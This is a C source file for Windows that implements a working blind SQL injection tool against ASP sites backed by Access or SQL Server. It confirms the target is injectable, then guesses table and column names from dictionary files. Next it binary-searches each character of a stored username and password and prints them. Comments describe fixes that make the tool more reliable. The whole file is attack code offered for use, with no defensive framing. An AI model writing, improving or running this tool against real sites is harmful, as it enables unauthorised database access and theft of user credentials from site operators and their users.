// Revised April 20. The code may not follow conventions and has no comments.
#include <windows.h>
#include <winsock.h>
#include <wininet.h>
#include <conio.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "wininet.lib")
typedef struct{ //one guessed column and the state used while guessing it
char *name; //column name; filled in from the dictionary by GetItem
DWORD len; //guessed length of the column value; written by GetResult via the thread exit code
char *dic; //path of the dictionary file GetItem reads column-name candidates from
char *cs; //SQL expression evaluated against the row, e.g. "len(name)" or "asc(mid(name,3,1))"
char *url; //base injection URL (argv[1]); every probe appends " and exists (...)" to it
char *table; //table name; filled in from table.txt by Gettable
int m; //upper bound (exclusive) for GetResult's binary search
int id; //row id the value is read from
}ITEM;
typedef struct{ //the pair of columns this tool guesses for one row
ITEM uitem; //user-name column
ITEM pitem; //password column (shares url and table with uitem)
}PR;
char buffer[1024*1024]; //shared response buffer returned by GeturlResponse; overwritten on every fetch
char flag[30]; //error-page marker (e.g. "/movie.asp") derived from the URL by Getflag
char *flagr="html"; //substring expected in a normally rendered (non-error) page
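/* Fetch `url` with WinInet and return the body as a C string.
 * The result always lives in the file-scope `buffer`, which every call
 * overwrites, so a caller must finish with one response before fetching the
 * next. On any failure (handle creation or read) the buffer is left as ""
 * rather than NULL, so strstr() on the result is always safe.
 * The old code read a single chunk and could leave the buffer unterminated
 * when the read filled it completely. */
char *GeturlResponse(char *url)
{
    DWORD dwBytesRead=0;
    DWORD total=0;
    HINTERNET hNet;
    HINTERNET hUrlFile;
    memset(buffer,0,sizeof(buffer));
    hNet=InternetOpen("Sql",PRE_CONFIG_INTERNET_ACCESS,NULL,INTERNET_INVALID_PORT_NUMBER,0);
    if(!hNet)
        return buffer;
    hUrlFile=InternetOpenUrl(hNet,url,NULL,0,INTERNET_FLAG_RELOAD,0);
    if(!hUrlFile)
    {
        InternetCloseHandle(hNet);
        return buffer;
    }
    /* InternetReadFile hands back one chunk per call; keep reading until it
     * reports 0 bytes, leaving one byte spare for the terminator. */
    while(total<sizeof(buffer)-1)
    {
        if(!InternetReadFile(hUrlFile,buffer+total,(DWORD)(sizeof(buffer)-1-total),&dwBytesRead))
            break;
        if(dwBytesRead==0)
            break;
        total+=dwBytesRead;
    }
    buffer[total]='\0';
    InternetCloseHandle(hUrlFile);
    InternetCloseHandle(hNet);
    return buffer;
}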
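/* Derive the "error page marker" from the injection URL: the path component
 * ending in ".asp", e.g. "/movie.asp" out of "http://host/movie.asp?id=1".
 * The tool relies on the server's error page echoing that path, so its
 * presence in a response is later read as "the injected query failed".
 *
 * url: injection URL.  p1: output buffer; the caller passes the file-scope
 * flag[30], and since the signature carries no size the copy is bounded to
 * that size here.
 * Returns 1 with p1 filled on success; 0 with p1 set to "" when the URL has
 * no ".asp", no '/' before it, or the marker would not fit.
 * Fixes over the old code: a NULL from strstr() is no longer dereferenced,
 * the backward scan cannot run before the start of the string, the copy is
 * bounded, and the marker ends after ".asp" instead of at the first 'p'
 * (which turned "/page.asp" into "/p"). */
enum { GETFLAG_BUFSIZE = 30 }; /* must match flag[30] at file scope */
int Getflag(char *url,char *p1)
{
    const char *ext;
    const char *start;
    size_t len;
    p1[0]='\0';
    ext=strstr(url,".asp");
    if(!ext)
    {
        printf("Get flag failed\n\n");
        return 0;
    }
    /* walk back to the '/' that begins the path component */
    start=ext;
    while(start>url && *start!='/')
        start--;
    if(*start!='/')
    {
        printf("Get flag failed\n\n");
        return 0;
    }
    len=(size_t)(ext+4-start); /* "/name" plus ".asp" */
    if(len>=GETFLAG_BUFSIZE)
    {
        printf("Get flag failed\n\n");
        return 0;
    }
    memcpy(p1,start,len);
    p1[len]='\0';
    printf("The flag is %s\n\n",p1);
    return 1;
}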
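/* Thread entry: test whether the URL is injectable by appending a single
 * quote and looking for the error-page marker `flag` in the response.
 * p: ITEM* whose url field is used.
 * Returns 1 when the marker appears (error page => injectable), 0 when it
 * does not or when the URL is too long to format safely. */
DWORD WINAPI CheckUrl(LPVOID p)
{
    ITEM u=*(ITEM *)p;
    char urlt[1024];
    /* wsprintf takes no size: refuse a URL that leaves no room for "'" and the NUL */
    if(strlen(u.url)+2>sizeof(urlt))
    {
        printf("Url too long\n");
        return 0;
    }
    wsprintf(urlt,"%s'",u.url);
    printf("Geting the %s Response data......\n",urlt);
    if(strstr(GeturlResponse(urlt),flag))
    {
        printf("This url could be injected!\n\n");
        return 1;
    }
    printf("This url could not be injected!\n");
    return 0;
}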
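/* Thread entry: guess the table name by trying each line of table.txt in
 * "... and exists (select * from <name>)"; the first candidate whose page
 * does NOT show the error marker is taken as the table.
 * The name is written through t.table. ITEM carries no capacity for it and
 * main() sets it up as a 20-byte buffer, so that bound is fixed here.
 * Returns 1 on a hit (t.table filled), 0 when the dictionary is missing, the
 * request URL would not fit, or no candidate matched.
 * Fixes over the old code: lines are read into a local buffer instead of
 * fgets(...,100) straight into the 20-byte t.table, an empty line no longer
 * indexes t.table[-1], the feof() loop no longer re-tests the last line, and
 * the dictionary is closed on the success path too. */
enum { GETTABLE_NAME_CAP = 20 }; /* must match the table buffer size set up in main() */
DWORD WINAPI Gettable(LPVOID p)
{
    ITEM t=*(ITEM *)p;
    FILE *dic;
    char line[100];
    char urlt[1025]; /* wsprintf never writes more than 1024 characters */
    size_t n;
    dic = fopen("table.txt", "rt");
    if(!dic)
    {
        printf("can't open table dic!\n");
        return 0;
    }
    while(fgets(line,sizeof(line),dic))
    {
        n=strcspn(line,"\r\n");
        line[n]='\0';
        if(n==0)
            continue; /* blank line: "select * from " is never a valid table */
        if(n>=GETTABLE_NAME_CAP)
        {
            printf("table name too long, skipped: %s\n",line);
            continue;
        }
        /* url + name + the fixed " and exists (select * from " and ")" */
        if(strlen(t.url)+n+32>=sizeof(urlt))
        {
            printf("Url too long\n");
            fclose(dic);
            return 0;
        }
        wsprintf(urlt,"%s and exists (select * from %s)",t.url,line);
        puts(urlt);
        if(!strstr(GeturlResponse(urlt),flag))
        {
            strcpy(t.table,line); /* n < GETTABLE_NAME_CAP checked above */
            printf("\nWe get the table\nThe table name is %s\n\n",t.table);
            fclose(dic);
            return 1;
        }
    }
    fclose(dic);
    return 0;
}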
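/* Thread entry: guess one column name (user name or password) by trying each
 * line of the dictionary item.dic in "... and exists (select <col> from <table>)";
 * the first candidate whose page shows no error marker is taken.
 * The name is written through item.name. ITEM carries no capacity for it and
 * main() sets it up as a 30-byte buffer, so that bound is fixed here.
 * Returns 1 on a hit (item.name filled), 0 when the dictionary cannot be
 * opened, the request URL would not fit, or no candidate matched.
 * Fixes over the old code: an empty line no longer indexes item.name[-1],
 * over-long lines are skipped instead of being split into several
 * candidates, the feof() loop no longer re-tests the last line, and the
 * dictionary is closed on the success path too. */
enum { GETITEM_NAME_CAP = 30 }; /* must match the name buffer size set up in main() */
DWORD WINAPI GetItem(LPVOID p)
{
    ITEM item=*(ITEM *)p;
    FILE *dic;
    char line[100];
    char urlt[1025]; /* wsprintf never writes more than 1024 characters */
    size_t n;
    dic=fopen(item.dic, "rt");
    if(!dic)
    {
        printf("can't open %s dic!\n",item.dic);
        return 0;
    }
    while(fgets(line,sizeof(line),dic))
    {
        n=strcspn(line,"\r\n");
        line[n]='\0';
        if(n==0)
            continue; /* blank line: "select  from" is never a valid column */
        if(n>=GETITEM_NAME_CAP)
        {
            printf("item name too long, skipped: %s\n",line);
            continue;
        }
        /* url + name + table + the fixed " and exists (select ", " from " and ")" */
        if(strlen(item.url)+n+strlen(item.table)+32>=sizeof(urlt))
        {
            printf("Url too long\n");
            fclose(dic);
            return 0;
        }
        wsprintf(urlt,"%s and exists (select %s from %s)",item.url,line,item.table);
        puts(urlt);
        if(!strstr(GeturlResponse(urlt),flag))
        {
            strcpy(item.name,line); /* n < GETITEM_NAME_CAP checked above */
            printf("\nWe get the item\nThe item(username) is %s\n\n",item.name);
            fclose(dic);
            return 1;
        }
    }
    fclose(dic);
    return 0;
}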
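/* Thread entry: binary-search the integer value of the SQL expression up.cs
 * (e.g. "len(username)" or "asc(mid(username,3,1))") for row up.id of table
 * up.table, using the error marker as a boolean oracle. The candidate value
 * is kept in the open interval (lo, hi) with lo starting at 1 and hi at up.m.
 * Returns the value found, or 0 when the oracle says no value lies in the
 * interval, when the request URL would not fit, or when the interval has
 * collapsed (0 is therefore ambiguous with a real 0; callers treat it as
 * "not found", which is what the old code did as well).
 * Each probe fetches its page once and checks both markers on that same
 * response; the old code fetched the same URL twice per condition and
 * leaked a malloc'd URL buffer on every iteration. It could also spin
 * forever when the oracle never reported an error; the hi<=lo+1 guard ends
 * the search in that case.
 * NOTE(review): unlike GetMinId, the "html" check here is case-sensitive —
 * confirm that is intended. */
DWORD WINAPI GetResult(LPVOID p)
{
    ITEM up=*(ITEM *)p;
    char urlt[1025]; /* wsprintf never writes more than 1024 characters */
    const char *page;
    int lo=1,hi=up.m,mid;
    int err,ishtml;
    /* worst case of the three formats below: url + table + two copies of cs + fixed text and numbers */
    if(strlen(up.url)+strlen(up.table)+2*strlen(up.cs)+96>=sizeof(urlt))
    {
        printf("Url too long\n");
        return 0;
    }
    while(1)
    {
        /* no integer can satisfy lo < x < hi once they are adjacent */
        if(hi<=lo+1)
        {
            printf("We can't get the %s\n",up.cs);
            return 0;
        }
        /* is the value strictly inside (lo, hi) at all? */
        wsprintf(urlt,"%s and exists (select id from %s where id=%d and %s>%d and %s<%d)",
            up.url,up.table,up.id,up.cs,lo,up.cs,hi);
        puts(urlt);
        if(strstr(GeturlResponse(urlt),flag))
        {
            printf("We can't get the %s\n",up.cs);
            return 0;
        }
        mid=(lo+hi)/2;
        /* exact hit: a normal page (no error marker, "html" present) */
        wsprintf(urlt,"%s and exists (select id from %s where id=%d and %s=%d)",up.url,up.table,up.id,up.cs,mid);
        puts(urlt);
        page=GeturlResponse(urlt);
        err=strstr(page,flag)!=NULL;
        ishtml=strstr(page,flagr)!=NULL;
        if(!err&&ishtml)
        {
            printf("The %s %s is %d\n\n",up.name,up.cs,mid);
            return (DWORD)mid;
        }
        /* otherwise halve the interval: "value > mid" keeps the upper half */
        wsprintf(urlt,"%s and exists (select id from %s where id=%d and %s>%d)",up.url,up.table,up.id,up.cs,mid);
        puts(urlt);
        page=GeturlResponse(urlt);
        err=strstr(page,flag)!=NULL;
        ishtml=strstr(page,flagr)!=NULL;
        if(err||!ishtml)
            hi=mid;
        else
            lo=mid;
    }
}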
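/* Thread entry: find the smallest row id in 1..7999 that exists in ID.table.
 * An id counts as present when its page shows no error marker and does
 * contain "html" (checked on the lower-cased response).
 * Returns the id, or (DWORD)-1 when none was found or the URL does not fit;
 * main() compares the exit code against -1.
 * The old code malloc'd a URL buffer per iteration without freeing it and
 * fetched the page a second time just to lower-case it. */
DWORD WINAPI GetMinId(LPVOID p)
{
    ITEM ID=*(ITEM *)p;
    char urlt[1025]; /* wsprintf never writes more than 1024 characters */
    char *page;
    int id;
    if(strlen(ID.url)+strlen(ID.table)+64>=sizeof(urlt))
    {
        printf("Url too long\n");
        return (DWORD)-1;
    }
    for(id=1;id<8000;id++)
    {
        wsprintf(urlt,"%s and exists (select id from %s where id=%d)",ID.url,ID.table,id);
        puts(urlt);
        page=GeturlResponse(urlt);
        if(strstr(page,flag))
        {
            printf("%d\n",id);
            continue;
        }
        if(strstr(strlwr(page),flagr))
        {
            printf("The min id is %d\n",id);
            return (DWORD)id;
        }
    }
    return (DWORD)-1;
}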
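/* Run one guessing step on its own thread and wait for it, returning the
 * thread's exit code through *code. Returns 0 if the thread could not be
 * created (*code is then left untouched). The handle is always closed; the
 * old code leaked most of them. */
static int run_step(LPTHREAD_START_ROUTINE fn,ITEM *item,DWORD *code)
{
    DWORD threadId;
    HANDLE h=CreateThread(NULL,0,fn,(LPVOID)item,0,&threadId);
    if(!h)
        return 0;
    WaitForSingleObject(h,INFINITE);
    GetExitCodeThread(h,code);
    CloseHandle(h);
    return 1;
}

/* Entry point of a boolean-based blind SQL injection guesser for ASP pages
 * (Access via asc(mid()), SQL Server via unicode(substring())).
 * argv[1]: injection URL such as http://host/movie.asp?id=1
 * argv[2] (optional): row id to read; defaults to the smallest existing id.
 * Flow: derive the error marker, confirm the URL is injectable, guess the
 * table, the user and password column names, the row id, both value lengths
 * and finally each character code. Every step runs on its own thread but is
 * waited on immediately, so the work is sequential and the shared response
 * buffer is never used by two threads at once.
 * Returns 0 on success and 1 on failure (the old code returned 1 on success).
 * Fixes over the old code: the probe URL was formatted into an 80-byte
 * malloc; `if(!flag)` tested the array's address and never failed;
 * username/password held 17 entries while a length of up to 31 was
 * accepted; the character loop tested pitem.len twice, cutting a longer
 * user name short; the cs buffers were re-malloc'd and leaked every round;
 * and the "username is:" printf was given an argument with no conversion. */
enum { TABLE_BUF = 100, NAME_BUF = 30, CS_BUF = 200, MAX_CHARS = 128 };
int main(int argc,char **argv)
{
    PR p;
    DWORD exitid;
    DWORD uexit,pexit;
    DWORD userid;
    DWORD pnum;
    DWORD username[MAX_CHARS];
    DWORD password[MAX_CHARS];
    int type;
    char *url;
    char urlt[1025]; /* wsprintf never writes more than 1024 characters */
    /* TABLE_BUF covers Gettable's fgets(...,100); NAME_BUF covers GetItem's 30-byte names */
    char utable[TABLE_BUF],ptable[TABLE_BUF];
    char uname[NAME_BUF],pname[NAME_BUF];
    char ucs[CS_BUF],pcs[CS_BUF];
    if(argc<2)
    {
        printf("Useage:inject.exe http://www.xxx.net/movie.asp?id=1 userid(a number)\n");
        printf("example:inject.exe http://www.xxx.net/movie.asp?id=1 1\n");
        printf(" if userid is 1,then you will get the username and password \n\twhose id is 1.\n");
        printf(" If you don't give userid ,the id will be the minist id.\n");
        return 0;
    }
    url=argv[1];
    if(strlen(url)+2>sizeof(urlt))
    {
        printf("Url too long\n");
        return 1;
    }
    wsprintf(urlt,"%s'",url);
    /* crude engine detection: a SQL Server error page mentions "SQL", an Access one does not */
    type=strstr(GeturlResponse(urlt),"SQL")?0:1;
    memset(&p,0,sizeof(p));
    utable[0]=ptable[0]=uname[0]=pname[0]=ucs[0]=pcs[0]='\0';
    p.uitem.table=utable;
    p.pitem.table=ptable;
    p.uitem.name=uname;
    p.pitem.name=pname;
    p.uitem.cs=ucs;
    p.pitem.cs=pcs;
    p.uitem.url=url;
    p.pitem.url=url;
    p.uitem.dic="user.txt";
    p.pitem.dic="pass.txt";
    p.uitem.m=32; /* upper bound for the length search */
    p.pitem.m=32;
    p.uitem.id=1;
    p.pitem.id=1;
    memset(flag,0,sizeof(flag));
    if(!Getflag(p.uitem.url,flag))
    {
        printf("Can't get the flag\n\n");
        return 1;
    }
    if(!run_step(CheckUrl,&p.uitem,&exitid)||!exitid)
        return 1; /* CheckUrl already reported "could not be injected" */
    if(!run_step(Gettable,&p.uitem,&exitid)||!exitid)
    {
        printf("Can't get the talbe name\n");
        return 1;
    }
    strcpy(p.pitem.table,p.uitem.table); /* both buffers are TABLE_BUF bytes */
    uexit=0;
    run_step(GetItem,&p.uitem,&uexit);
    if(!uexit)
        printf("We can't get the user item\n");
    pexit=0;
    run_step(GetItem,&p.pitem,&pexit);
    if(!pexit)
        printf("We can't get the pass item\n");
    exitid=(DWORD)-1;
    run_step(GetMinId,&p.uitem,&exitid);
    if(exitid==(DWORD)-1)
    {
        printf("Get min id failed \n");
        return 1;
    }
    userid=exitid;
    if(argc>2)
    {
        /* atoi() yields 0 for junk, which the "< min id" test rejects */
        if(atoi(argv[2])<(int)userid)
            printf("The id you gived is less than min id or is not a number,\n\twe will use id as %d\n",(int)userid);
        else
        {
            userid=(DWORD)atoi(argv[2]);
            printf("We will guest the user whose id is %d\n",(int)userid);
        }
    }
    p.uitem.id=(int)userid;
    p.pitem.id=(int)userid;
    /* names are < NAME_BUF chars, so "len(...)" always fits the CS_BUF buffers */
    wsprintf(p.uitem.cs,"len(%s)",p.uitem.name);
    wsprintf(p.pitem.cs,"len(%s)",p.pitem.name);
    if(uexit&&!run_step(GetResult,&p.uitem,&p.uitem.len))
        uexit=0;
    if(pexit&&!run_step(GetResult,&p.pitem,&p.pitem.len))
        pexit=0;
    /* GetResult stays below m=32, but never trust that more than the arrays allow */
    if(p.uitem.len>MAX_CHARS)
        p.uitem.len=MAX_CHARS;
    if(p.pitem.len>MAX_CHARS)
        p.pitem.len=MAX_CHARS;
    printf("len(u) is %d\nlen(p) is %d\n\n",(int)p.uitem.len,(int)p.pitem.len);
    p.uitem.m=128; /* upper bound for the character-code search */
    p.pitem.m=128;
    memset(username,0,sizeof(username));
    memset(password,0,sizeof(password));
    for(pnum=0;pnum<p.uitem.len||pnum<p.pitem.len;pnum++)
    {
        /* cs buffers are reused for every position */
        if(type==1)
        {
            wsprintf(p.uitem.cs,"asc(mid(%s,%d,1))",p.uitem.name,(int)pnum+1);
            wsprintf(p.pitem.cs,"asc(mid(%s,%d,1))",p.pitem.name,(int)pnum+1);
        }
        else
        {
            wsprintf(p.uitem.cs,"unicode(substring(%s,%d,1))",p.uitem.name,(int)pnum+1);
            wsprintf(p.pitem.cs,"unicode(substring(%s,%d,1))",p.pitem.name,(int)pnum+1);
        }
        if(pnum<p.uitem.len&&uexit)
            run_step(GetResult,&p.uitem,&username[pnum]);
        if(pnum<p.pitem.len&&pexit)
            run_step(GetResult,&p.pitem,&password[pnum]);
    }
    if(!uexit)
        printf("We can't get username\n");
    else
    {
        printf("\nusername is:");
        for(pnum=0;pnum<p.uitem.len;pnum++)
            printf("%c",(int)username[pnum]);
        printf("\n");
    }
    if(!pexit)
        printf("We can't get password\n");
    else
    {
        printf("\npassword is:");
        for(pnum=0;pnum<p.pitem.len;pnum++)
            printf("%c",(int)password[pnum]);
    }
    printf("\nGet ret ok!\n");
    return 0;
}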